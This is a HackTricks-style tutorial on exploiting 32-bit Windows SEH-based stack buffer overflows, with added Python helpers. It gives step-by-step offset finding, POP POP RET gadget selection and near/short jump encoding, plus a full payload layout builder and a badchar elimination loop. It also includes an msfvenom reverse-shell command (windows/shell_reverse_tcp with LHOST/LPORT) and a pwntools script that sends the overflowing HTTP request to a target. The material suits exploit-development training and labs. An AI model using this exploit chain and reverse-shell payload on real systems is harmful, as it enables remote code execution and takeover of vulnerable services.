Windows SEH-based Stack Overflow Exploitation (nSEH/SEH)
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
SEH-based exploitation is a classic x86 Windows technique that abuses the Structured Exception Handler chain saved on the stack (fs:[0] points to the first record). When a stack buffer overflow overwrites the two 4-byte fields of a record
- nSEH: pointer to the next SEH record, and
- SEH: pointer to the exception handler function
the attacker takes control of execution by:
- Setting SEH to the address of a POP POP RET gadget in an unprotected module. When the exception is dispatched, the handler is called with a pointer to the overwritten record (its EstablisherFrame argument) at [esp+8]; the two POPs discard the return address and the first argument, and RET lands on nSEH, i.e. on attacker-controlled bytes.
- Using nSEH to redirect execution (typically a short jump) back into the large overflowed buffer where the shellcode lives.
The technique is specific to 32-bit (x86) processes. On modern systems, take the gadget from a module built without SafeSEH and without ASLR. Common bad characters are 0x00, 0x0a and 0x0d (NUL/CR/LF) because of C-string handling and HTTP parsing.
Finding exact offsets (nSEH / SEH)
- Crash the process and verify that the SEH chain is overwritten (e.g., in x32dbg/x64dbg, check the SEH view).
- Send a cyclic pattern as the overflowing data and compute the offsets of the two dwords that land in nSEH and SEH.
Example with the Metasploit pattern tools or pwntools on a 1000-byte POST body:
# generate a pattern (any tool is fine, but resolve the offset with the matching tool: the two alphabets differ)
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
# or
python3 -c "from pwn import *; print(cyclic(1000).decode())"
# after the crash, note the two 32-bit values from the SEH view and compute the offsets
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x32424163 # nSEH
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x41484241 # SEH
# for a pwntools pattern: python3 -c "from pwn import *; print(cyclic_find(<dword from the SEH view>))"
# ➜ offsets example: nSEH=660, SEH=664
Confirm by placing 4-byte markers at those positions (e.g., nSEH=b"BBBB", SEH=b"CCCC") and checking that the SEH view shows 42424242 / 43434343. Keep the total length unchanged so the crash is reproducible. SEH is the second field of the record, so its offset must be exactly nSEH + 4; anything else means the crash is not a clean SEH overwrite.
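The pattern and offset tools above are usually enough, but a self-contained version makes the little-endian reading explicit and lets you sanity-check the result. The following is an added example, not code from the original page or from the referenced write-up: it reimplements the Metasploit-style pattern (same alphabet as pattern_create.rb), resolves a dword as displayed in the debugger's SEH view back to its offset, checks the SEH = nSEH + 4 invariant, and builds the marker payload for the confirmation run. The crash values it uses are constructed by reading the pattern at offsets 660/664 (an assumption made so the example runs offline), not values measured against a target.

```python
import struct

# Metasploit-style pattern alphabet: 'Aa0Aa1...Aa9Ab0...'. A 4-byte window
# identifies a single offset within the default 20280-byte pattern.
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGIT) * 3   # 20280


def pattern_create(length: int) -> bytes:
    """Same bytes as pattern_create.rb -l <length> (default character sets)."""
    if length > MAX_LEN:
        raise ValueError(f"a pattern longer than {MAX_LEN} bytes is not unique")
    full = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGIT)
    return full[:length].encode()


def dword_at(buf: bytes, off: int) -> int:
    """The value a debugger shows for the 4 bytes at `off` (read little-endian)."""
    return struct.unpack("<I", buf[off:off + 4])[0]


def pattern_offset(pattern: bytes, value: int):
    """Offset whose 4 bytes, read little-endian, equal `value` (pattern_offset.rb -q).
    Also tries the byte-reversed needle, so a value copied big-endian by mistake
    still resolves. Returns None when the dword did not come from the pattern."""
    needle = struct.pack("<I", value & 0xFFFFFFFF)
    for n in (needle, needle[::-1]):
        idx = pattern.find(n)
        if idx != -1:
            return idx
    return None


def seh_offsets(pattern: bytes, nseh_value: int, seh_value: int):
    """Resolve both dwords from the SEH view and check the record layout:
    SEH is the second field, so it must sit exactly 4 bytes after nSEH."""
    nseh = pattern_offset(pattern, nseh_value)
    seh = pattern_offset(pattern, seh_value)
    if nseh is None or seh is None:
        raise ValueError("dword not from the pattern: not a clean SEH overwrite")
    if seh != nseh + 4:
        raise ValueError(f"nSEH={nseh} but SEH={seh}; expected SEH = nSEH + 4")
    return nseh, seh


def marker_payload(nseh_off: int, total_len: int) -> bytes:
    """Confirmation run: 4-byte markers in nSEH/SEH, same total length as the pattern.
    The SEH view should then show 42424242 (BBBB) and 43434343 (CCCC)."""
    p = b"A" * nseh_off + b"BBBB" + b"CCCC"
    return p + b"D" * (total_len - len(p))


# Constructed crash values: what the SEH view would show if the record starts at
# offset 660 of a 1000-byte pattern (an assumption for this example, not measured).
PATTERN = pattern_create(1000)
CRASH_NSEH = dword_at(PATTERN, 660)   # 0x41307741, bytes "Aw0A"
CRASH_SEH = dword_at(PATTERN, 664)    # 0x77413177, bytes "w1Aw"

if __name__ == "__main__":
    nseh, seh = seh_offsets(PATTERN, CRASH_NSEH, CRASH_SEH)
    print(f"nSEH offset = {nseh}, SEH offset = {seh}")
    print(marker_payload(nseh, 1000)[nseh - 4:seh + 8])
```

The reversed-needle fallback is deliberate: the most common mistake at this step is typing the dword in the byte order it appears in a memory dump rather than as the debugger displays it, and the fallback turns that into a resolved offset instead of a silent miss.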
Choosing a POP POP RET (SEH gadget)
You need a POP POP RET sequence to discard the two dwords above the pointer to the overwritten record and return into your nSEH bytes. Find it in a module without SafeSEH and preferably without ASLR:
- Mona (Immunity/WinDbg): !mona modules, then !mona seh -m modulename
- x64dbg plugin ERC.Xdbg: ERC --SEH lists POP POP RET gadgets together with the SafeSEH status of each module.
Choose an address that contains no bad characters once written little-endian (e.g., p32(0x004094D8) becomes D8 94 40 00). Note the trailing 0x00 in that example: a null in the most significant byte only works when it is the last byte the copy has to write, because a C-string copy supplies it as the terminator and nothing after SEH reaches the target. Prefer gadgets inside the vulnerable binary itself if its protections allow.
Jump-back technique (short + near jmp)
nSEH is only 4 bytes, enough for a 2-byte short jump (EB xx) plus 2 bytes of padding. When you need to jump back hundreds of bytes to reach the start of your buffer, place a 5-byte near jump (E9 rel32) just before nSEH and chain to it with the short jump from nSEH.
With nasmshell (it assembles at origin 0, so the operand is the target address and the encoded displacement is target minus the end of the instruction):
nasm> jmp -660 ; too far for a short jump; near jmp is 5 bytes
E967FDFFFF
nasm> jmp short -8 ; 2-byte short jmp fits in nSEH (with 2 bytes of padding)
EBF6
nasm> jmp -652 ; 8 bytes closer, because the near jmp sits 8 bytes before nSEH
E96FFDFFFF
Layout idea for a 1000-byte payload with nSEH at offset 660:
from pwn import p32 # struct.pack("<I", addr) works just as well
buffer_length = 1000
shellcode = sc # bytes produced by the msfvenom -f python -v sc command below
payload = b"\x90"*50 + shellcode # NOP sled + shellcode at the start of the buffer
payload += b"A" * (660 - 8 - len(payload)) # pad so we are 8 bytes before nSEH
payload += b"\xE9\x6F\xFD\xFF\xFF" + b"EEE" # near jmp back to offset 0 (5B) + 3B padding
payload += b"\xEB\xF6" + b"BB" # nSEH: short jmp -8 onto the near jmp + 2B padding
payload += p32(0x004094D8) # SEH: POP POP RET, written as D8 94 40 00 (trailing null is the terminator, see above)
payload += b"D" * (buffer_length - len(payload)) # keeps the total length constant for a reproducible crash
Execution flow:
- The exception fires and the dispatcher calls the overwritten SEH.
- POP POP RET returns into our nSEH.
- nSEH executes jmp short -8, landing on the 5-byte near jump.
- The near jump lands at the start of our buffer, where the NOP sled + shellcode sit.
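The hard-coded E9/EB bytes above are correct only for nSEH at 660; the moment the offset changes they have to be recomputed, and getting a displacement off by one silently lands the jump inside the padding. The following is an added example (not code from the page or from the write-up it references) that encodes short/near jumps the same way nasm does, builds the layout from the offset instead of from constants, rejects bad characters, and then follows the EB/E9 chain from nSEH to prove it ends at offset 0. The shellcode is a constructed int3 filler and the gadget address is the page's 0x004094D8; both are placeholders, not values verified against a real target.

```python
import struct


def encode_jmp(src: int, dst: int) -> bytes:
    """x86 relative jmp from the instruction at buffer offset `src` to offset `dst`.
    Uses EB rel8 when the displacement fits, E9 rel32 otherwise. The displacement
    is relative to the end of the instruction (src + 2 or src + 5), which is what
    nasm encodes when you type `jmp <target>` at origin 0."""
    rel8 = dst - (src + 2)
    if -128 <= rel8 <= 127:
        return b"\xEB" + struct.pack("<b", rel8)
    return b"\xE9" + struct.pack("<i", dst - (src + 5))


def build_seh_payload(shellcode: bytes, nseh_off: int, seh_gadget: int,
                      total_len: int, badchars: bytes = b"\x00\x0a\x0d",
                      sled: int = 50) -> bytes:
    """Layout: [NOP sled + shellcode][pad][near jmp -> 0][pad][nSEH: short jmp][SEH][pad].
    Offsets are computed, not hard-coded, so changing nseh_off keeps the chain valid."""
    near_off = nseh_off - 8                       # 8-byte slot right before nSEH
    near_jmp = encode_jmp(near_off, 0)            # back to the start of the buffer
    short_jmp = encode_jmp(nseh_off, near_off)    # nSEH hops onto the near jmp
    seh = struct.pack("<I", seh_gadget)

    payload = b"\x90" * sled + shellcode
    if len(payload) > near_off:
        raise ValueError("sled + shellcode do not fit before the near jmp slot")
    payload += b"A" * (near_off - len(payload))
    payload += (near_jmp + b"E" * 8)[:8]          # jmp + padding to fill the slot
    payload += (short_jmp + b"B" * 4)[:4]         # nSEH: short jmp + padding
    payload += seh
    if len(payload) > total_len:
        raise ValueError("total_len too small for nSEH/SEH at this offset")
    payload += b"D" * (total_len - len(payload))

    # Bad-character check over everything that must reach the target intact.
    # A 0x00 in the top byte of the SEH address is tolerated: it is the last byte
    # the copy has to write and a C-string copy supplies it as the terminator
    # (nothing after SEH can be relied on in that case).
    end = nseh_off + 7 if seh[3] == 0 else nseh_off + 8
    bad = sorted({b for b in payload[:end] if b in badchars})
    if bad:
        raise ValueError("bad characters in payload: " + ", ".join(hex(b) for b in bad))
    return payload


def trace_jumps(buf: bytes, pc: int, max_hops: int = 8) -> int:
    """Follow EB/E9 jumps from `pc` and return the first non-jump offset reached.
    Mirrors what the CPU does once POP POP RET returns into nSEH."""
    for _ in range(max_hops):
        op = buf[pc]
        if op == 0xEB:
            pc = pc + 2 + struct.unpack("<b", buf[pc + 1:pc + 2])[0]
        elif op == 0xE9:
            pc = pc + 5 + struct.unpack("<i", buf[pc + 1:pc + 5])[0]
        else:
            return pc
        if not 0 <= pc < len(buf):
            raise ValueError(f"jump left the buffer (offset {pc})")
    raise ValueError("jump chain does not terminate")


# Constructed stand-in for msfvenom output (int3 filler), not real shellcode.
SHELLCODE = b"\xCC" * 300
SEH_GADGET = 0x004094D8    # POP POP RET address reused from the layout above

if __name__ == "__main__":
    p = build_seh_payload(SHELLCODE, 660, SEH_GADGET, 1000)
    print("near jmp @652:", p[652:657].hex())
    print("nSEH     @660:", p[660:664].hex())
    print("SEH      @664:", p[664:668].hex())
    print("lands at offset", trace_jumps(p, 660))
```

trace_jumps is the check worth keeping around: run it on every variant of the buffer before sending it, because a payload that crashes the target but jumps into padding looks identical in the debugger to one whose offset is simply wrong.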
Bad characters
Send the full badchar string, then compare the stack memory after the crash with what you sent and drop the bytes the target's parser corrupts, replaces, or truncates at. Do it one byte per round: the first bad byte usually shifts or cuts everything after it, so only the first mismatch of each round is reliable. For HTTP-based overflows, \x00\x0a\x0d are almost always excluded from the start. With Mona, !mona bytearray -cpb "\x00\x0a\x0d" writes the string to a file and !mona compare -f <bytearray.bin> -a <address> does the comparison.
badchars = bytes([x for x in range(1,256)])
payload = b"A"*660 + b"BBBB" + b"CCCC" + badchars # position it where your case needs it
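The comparison step is where most time goes, so here is the elimination loop written out as an added example (not the page's code and not a Mona feature): it generates the probe string minus the bytes already found, compares the bytes read back from the stack with what was sent, and keeps only the first mismatch of each round before resending. The stack read itself is target specific, so a constructed stand-in parser (one that stops at CR/LF and turns tabs into spaces, an assumption chosen so the example runs offline) plays the role of "crash, then dump the stack".

```python
def badchar_string(exclude: bytes = b"") -> bytes:
    """Bytes 0x01..0xFF minus the ones already found to be bad. 0x00 is never
    sent: it terminates a C-string copy before the rest of the buffer lands."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_divergence(sent: bytes, seen: bytes):
    """Compare what was sent with the bytes dumped from the stack after the crash.
    Returns (sent_byte, seen_byte_or_None, index) for the first mismatch, or None
    when the string arrived intact. Only the first mismatch per round is reliable:
    a dropped, expanded or terminating byte shifts or cuts everything after it."""
    for i, b in enumerate(sent):
        if i >= len(seen):
            return (b, None, i)        # truncated: a terminator-like byte
        if seen[i] != b:
            return (b, seen[i], i)     # transformed in place
    return None


def find_badchars(dump_after_crash, max_rounds: int = 16) -> bytes:
    """Iterative elimination, the way it is done against a live target: send the
    string, read the stack back, drop the first byte that broke, repeat until clean.
    `dump_after_crash(probe) -> bytes` stands in for "crash, then read the copied
    bytes from the stack in the debugger"; that part is target specific."""
    bad = bytearray()
    for _ in range(max_rounds):
        probe = badchar_string(bytes(bad))
        diff = first_divergence(probe, dump_after_crash(probe))
        if diff is None:
            return bytes(bad)
        bad.append(diff[0])
    raise RuntimeError("still diverging after many rounds; check the comparison window")


def constructed_target(data: bytes) -> bytes:
    """Stand-in for the vulnerable service, constructed for this example: a
    line-based reader stops at the first CR or LF, then the parser turns tabs
    into spaces before the overflowing copy happens."""
    line = data.split(b"\n", 1)[0].split(b"\r", 1)[0]
    return line.replace(b"\t", b" ")


if __name__ == "__main__":
    found = find_badchars(constructed_target)
    print("bad characters:", " ".join(f"\\x{b:02x}" for b in found))
    # The probe as it sits in the SEH layout (nSEH/SEH offsets from the page):
    probe = b"A" * 660 + b"BBBB" + b"CCCC" + badchar_string(b"\x00" + found)
    print(len(probe), "bytes in the next probe")
```

Against a real target, replace constructed_target with a function that sends the probe, waits for the crash, and returns the bytes at the address where the copied string sits on the stack; the rest of the loop is unchanged.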
Shellcode generation (x86)
Use msfvenom with your bad characters. A small NOP sled in front of the shellcode helps tolerate variation in the landing spot.
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> \
-b "\x00\x0a\x0d" -f python -v sc
If you generate on the fly, hex output is easy to paste and unhex in Python (bytes.fromhex(...)):
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> \
-b "\x00\x0a\x0d" -f hex
Delivery over HTTP (correct CRLFs + Content-Length)
When the vulnerable vector is an HTTP request body, build the raw request with proper CRLF line endings, an empty line before the body, and a Content-Length so the server reads the whole overflowing body.
# pip install pwntools
from pwn import remote

host, port = "<TARGET_IP>", 8080
body = b"A" * 1000 # replace with the SEH-aware buffer above

headers = [
b"POST / HTTP/1.1",
f"Host: {host}:{port}".encode(),
b"User-Agent: curl/8.5.0",
b"Accept: */*",
f"Content-Length: {len(body)}".encode(),
b"Connection: close",
]
# headers are CRLF-separated and end with an empty line (CRLF CRLF) before the body
req = b"\r\n".join(headers) + b"\r\n\r\n" + body

p = remote(host, port)
p.send(req)
print(p.recvall(timeout=0.5)) # the service usually dies on the crash; the read just times out
p.close()
Tooling
- x32dbg/x64dbg to view the SEH chain and triage the crash.
- ERC.Xdbg (x64dbg plugin) to list SEH gadgets: ERC --SEH.
- Mona as an alternative: !mona modules, !mona seh.
- nasmshell to assemble short/near jumps and copy the raw opcodes.
- pwntools to craft precise network payloads.
Notes and caveats
- Works only against x86 processes. x64 uses table-based exception handling (unwind data in .pdata, no handler pointers on the stack), so SEH-overwrite exploitation is generally not viable.
- Prefer gadgets in modules without SafeSEH and without ASLR; if the main binary has both, look for an unprotected third-party DLL loaded in the process.
- The layout above returns into shellcode on the stack, so it assumes DEP is off for the process; with DEP you need a ROP chain (e.g. to VirtualProtect) before the shellcode. Where SEHOP is enabled (default on server SKUs and in recent Exploit Protection defaults) the handler chain is validated and a plain SEH overwrite fails as well.
- Service watchdogs that automatically restart the process after a crash make iterative exploit development easier.
References
- HTB: Rainbow – SEH overflow to RCE over HTTP (0xdf)
- ERC.Xdbg – Exploit Research Plugin for x64dbg (SEH search)
- Corelan – Exploit writing tutorial part 7 (SEH)
- Mona.py – WinDbg/Immunity helper